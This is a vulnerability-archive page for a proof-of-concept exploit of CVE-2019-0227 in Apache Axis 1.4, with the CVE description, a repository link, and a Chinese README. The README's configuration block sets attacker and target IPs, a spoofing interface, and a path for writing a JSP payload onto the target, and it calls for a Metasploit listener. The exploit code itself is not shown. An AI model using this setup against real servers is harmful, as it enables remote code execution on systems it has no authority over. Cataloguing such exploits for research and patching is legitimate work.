Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-0227 PoC — Apache Axis 代码问题漏洞

Source
https://github.com/ianxtianxt/cve-2019-0227
Associated Vulnerability
Title:Apache Axis 代码问题漏洞 (CVE-2019-0227)
Description:A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue.
Description
apache axis1.4远程代码执行漏洞
Readme
# cve-2019-0227
apache axis1.4远程代码执行漏洞
需要在本机msf设置监听,另外需要修改代码24-30行处

#您需要更改这些变量以匹配您的配置
myip =  “ 192.168.0.117 ”  #您机器的IP
target =  “ 192.168.0.102 ”  #目标IP
网关=  “ 192.168.0.1 ”  #默认网关
targetport =  “ 8080 ”  #目标运行轴的端口(可能是8080)
pathtoaxis =  “ http://192.168.0.102:8080/axis ”  #这可以是自定义的视轴安装,但是这是默认
spoofinterface =  “ eth0 ”  #伪造的接口
jspwritepath =  “ webapps \\ axis \\ exploit.jsp ”  #在目标上写入JSP有效负载的相对路径这是Tomcat安装的默认路径
File Snapshot

 [4.0K]  /data/pocs/9ef25c0f12713285c41a15d3740bf9d12c4fbd7b
├── [7.4K]  cve-2019-0227.py
└── [ 700]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →